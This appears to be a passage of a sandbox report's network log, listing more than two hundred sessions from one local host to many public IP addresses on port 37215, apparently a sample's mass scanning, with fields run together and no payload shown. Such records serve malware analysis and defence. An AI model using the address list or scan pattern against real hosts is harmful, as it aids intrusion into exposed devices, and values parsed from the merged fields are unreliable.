                                                          9090192.168.2.1534842197.5.181.5437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9091192.168.2.1542450197.12.253.19837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9092192.168.2.155718641.85.30.22337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9093192.168.2.153787241.93.78.19837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9094192.168.2.1537528157.193.242.10937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9095192.168.2.1552558197.19.72.2037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9096192.168.2.153453870.85.236.6337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9097192.168.2.1560524197.205.183.22337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9098192.168.2.1556038197.105.44.037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9099192.168.2.1533666157.119.85.25037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9100192.168.2.1534824194.89.89.11137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9101192.168.2.1553400157.27.57.6037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9102192.168.2.1539524203.159.216.17937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9103192.168.2.153680041.141.57.7837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9104192.168.2.154369841.178.235.13537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9105192.168.2.154855041.66.103.17237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9106192.168.2.154505441.5.55.3237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9107192.168.2.153305841.56.242.6637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9108192.168.2.154246641.164.175.7137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9109192.168.2.1539062150.122.229.22237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9110192.168.2.1542696157.53.101.22537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9111192.168.2.154201841.111.243.6337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9112192.168.2.1542260197.139.246.4737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9113192.168.2.1556994163.182.206.25037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9114192.168.2.1551842197.127.205.13137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9115192.168.2.154600041.24.150.7237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9116192.168.2.155635241.100.195.16437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9117192.168.2.1542688157.102.33.2237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9118192.168.2.1543256170.236.63.11537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9119192.168.2.154273280.30.198.21437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9120192.168.2.1546450190.65.91.17037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9121192.168.2.1541420197.241.24.15637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9122192.168.2.1549278152.58.143.10337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9123192.168.2.1542156157.31.167.5637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9124192.168.2.1540854197.153.85.15037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9125192.168.2.1536046157.5.167.22037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9126192.168.2.155959641.37.134.19237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9127192.168.2.1556728197.207.246.5437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9128192.168.2.1559120141.136.215.3137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9129192.168.2.156068443.105.110.6137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9130192.168.2.155919841.37.57.23137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9131192.168.2.154563241.33.96.8537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9132192.168.2.155839231.195.140.21137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9133192.168.2.1544942197.8.125.5537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9134192.168.2.1548486197.147.89.17337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9135192.168.2.1554610157.180.1.17837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9136192.168.2.154528241.43.114.12037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9137192.168.2.155657641.103.142.23037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9138192.168.2.154317077.162.209.11737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9139192.168.2.153909612.208.237.16337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9140192.168.2.154716441.174.85.10937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9141192.168.2.15389265.131.113.17337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9142192.168.2.1548074157.16.167.937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9143192.168.2.1551146157.67.77.16637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9144192.168.2.1545644116.8.102.2437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9145192.168.2.1534526157.168.34.2337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9146192.168.2.1532974197.126.37.18937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9147192.168.2.154259641.98.15.2137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9148192.168.2.154825041.230.225.25337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9149192.168.2.1552378197.172.10.237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9150192.168.2.1541840197.4.144.8037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9151192.168.2.153921241.121.116.19737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9152192.168.2.155858657.136.2.19837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9153192.168.2.1550916197.231.75.16337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9154192.168.2.154958677.147.33.21037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9155192.168.2.1544330167.6.146.4537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9156192.168.2.1553970197.71.61.17637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9157192.168.2.1559026197.143.13.11737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9158192.168.2.1548526197.28.45.11637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9159192.168.2.156003841.144.129.7537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9160192.168.2.1537956211.22.231.22037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9161192.168.2.1537436157.94.80.21837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9162192.168.2.1552278197.140.110.1437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9163192.168.2.153394841.188.173.25537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9164192.168.2.154526641.113.187.7737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9165192.168.2.1556122197.30.78.9537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9166192.168.2.155472841.184.164.17637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9167192.168.2.1544644197.159.162.3437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9168192.168.2.1546084197.15.126.9237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9169192.168.2.1555898157.201.173.17537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9170192.168.2.1550890100.20.54.25437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9171192.168.2.155640646.155.38.18637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9172192.168.2.1547098197.11.239.19337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9173192.168.2.155209447.122.81.037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9174192.168.2.1544444193.196.202.16737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9175192.168.2.154114282.17.219.2437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9176192.168.2.1533408164.22.83.10837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9177192.168.2.154249841.90.248.23637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9178192.168.2.154648674.98.229.16537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9179192.168.2.1544788197.38.10.4237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9180192.168.2.1539652120.9.18.18637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9181192.168.2.1551266157.216.2.4737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9182192.168.2.153541641.211.5.24737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9183192.168.2.1533498197.27.4.12737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9184192.168.2.1536764157.135.127.17337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9185192.168.2.1544718197.167.255.937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9186192.168.2.153330265.10.245.19137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9187192.168.2.1555712197.208.141.21737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9188192.168.2.1552932157.240.164.10037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9189192.168.2.1555410157.173.58.25437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9190192.168.2.1550734197.106.238.23037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9191192.168.2.153737641.242.243.9837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9192192.168.2.1549900146.139.24.9237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9193192.168.2.1536576197.250.124.20837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9194192.168.2.154082641.31.170.037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9195192.168.2.1553942157.207.215.3137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9196192.168.2.1555170157.81.0.437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9197192.168.2.154731841.88.233.8137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9198192.168.2.1559440157.43.126.2637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9199192.168.2.1546618197.58.252.10637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9200192.168.2.1546726197.202.128.15437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9201192.168.2.1557606197.82.118.3837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9202192.168.2.1557900157.0.161.2937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9203192.168.2.1534494197.178.68.17837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9204192.168.2.1542098157.210.246.13837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9205192.168.2.1542088197.58.248.21637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9206192.168.2.153368841.168.197.15237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9207192.168.2.1535624197.221.65.2037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9208192.168.2.1548342197.171.108.25237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9209192.168.2.1536248197.249.237.22337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9210192.168.2.1556462197.74.137.16037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9211192.168.2.1557392197.239.83.24037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9212192.168.2.1554620157.99.177.7537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9213192.168.2.1557730197.166.60.22037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9214192.168.2.1534560204.89.6.6837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9215192.168.2.154181437.27.111.15637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9216192.168.2.1534528210.190.100.2237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9217192.168.2.1548140208.173.158.2837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9218192.168.2.1539620157.209.33.12737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9219192.168.2.1533074157.189.187.15937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9220192.168.2.153573441.185.129.5837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9221192.168.2.1533700119.215.224.937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9222192.168.2.155100441.123.170.11037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9223192.168.2.155377641.226.180.6737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9224192.168.2.1533184223.83.26.2737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9225192.168.2.1557448157.202.90.18237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9226192.168.2.1533264221.29.231.24837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9227192.168.2.1556276157.80.145.19237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9228192.168.2.154264041.157.238.21737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9229192.168.2.1551018157.147.13.14937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9230192.168.2.1556392128.60.93.24237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9231192.168.2.1553834197.213.24.18237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9232192.168.2.155421841.75.238.9137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9233192.168.2.1554304213.204.15.937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9234192.168.2.1534630197.234.66.7637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9235192.168.2.155953641.236.35.5237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9236192.168.2.1543254157.59.203.7637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9237192.168.2.155523441.74.150.437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9238192.168.2.1545886197.202.226.15937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9239192.168.2.1542344197.30.5.19137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9240192.168.2.153296441.7.57.20037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9241192.168.2.1559786197.182.231.18437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9242192.168.2.156021041.165.216.20637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9243192.168.2.1556896197.31.125.12437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9244192.168.2.1549652157.228.133.18637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9245192.168.2.1544362157.130.15.25237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9246192.168.2.1538280157.146.47.14437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9247192.168.2.1537186157.33.62.8737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9248192.168.2.1542008197.214.255.6937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9249192.168.2.1541838157.157.186.22137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9250192.168.2.1535094100.5.83.23537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9251192.168.2.155547241.34.5.2037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9252192.168.2.1557534157.125.138.13737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9253192.168.2.154006641.233.73.11837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9254192.168.2.155296863.222.146.4637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9255192.168.2.156036041.35.4.19037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9256192.168.2.1539136157.156.104.16537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9257192.168.2.1538792157.92.174.16137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9258192.168.2.155399242.18.7.9437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9259192.168.2.1555618157.31.85.18537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9260192.168.2.155192041.171.230.23637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9261192.168.2.1544980136.17.220.14137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9262192.168.2.154052641.130.167.21337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9263192.168.2.1555348197.246.9.1037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9264192.168.2.1552998157.167.190.5837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9265192.168.2.154453299.6.35.10337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9266192.168.2.153938841.95.21.5637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9267192.168.2.1552704197.127.72.21837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9268192.168.2.1559294197.170.232.16537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9269192.168.2.1556078157.122.142.13537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9270192.168.2.1548192157.68.199.13837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9271192.168.2.1551558157.69.115.1637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9272192.168.2.155811641.133.213.1037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9273192.168.2.153912460.62.246.6537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9274192.168.2.153482441.127.164.2437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9275192.168.2.1545216197.70.217.9737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9276192.168.2.1533286197.255.72.6637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9277192.168.2.154726241.14.58.16537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9278192.168.2.1537610157.196.142.15037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9279192.168.2.153866091.68.194.18637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9280192.168.2.1559708197.145.229.3637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9281192.168.2.1546860166.101.148.8337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9282192.168.2.1553030157.157.50.137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9283192.168.2.1536320197.226.240.6037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9284192.168.2.1534026171.192.246.25437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9285192.168.2.1550528197.138.196.23637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9286192.168.2.1554398130.125.23.18337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9287192.168.2.1536778157.203.167.24237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9288192.168.2.154405241.164.239.8637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9289192.168.2.155191041.140.11.7237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9290192.168.2.155467441.116.117.6837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9291192.168.2.155873441.232.81.9737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9292192.168.2.1549728197.88.233.3037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9293192.168.2.1549154157.185.131.17937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9294192.168.2.1550112197.63.151.13337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9295192.168.2.153847641.55.127.19137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9296192.168.2.1546558157.130.228.15837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9297192.168.2.155899841.98.223.10837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9298192.168.2.1541886157.177.20.11837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9299192.168.2.1555620205.64.210.15637215
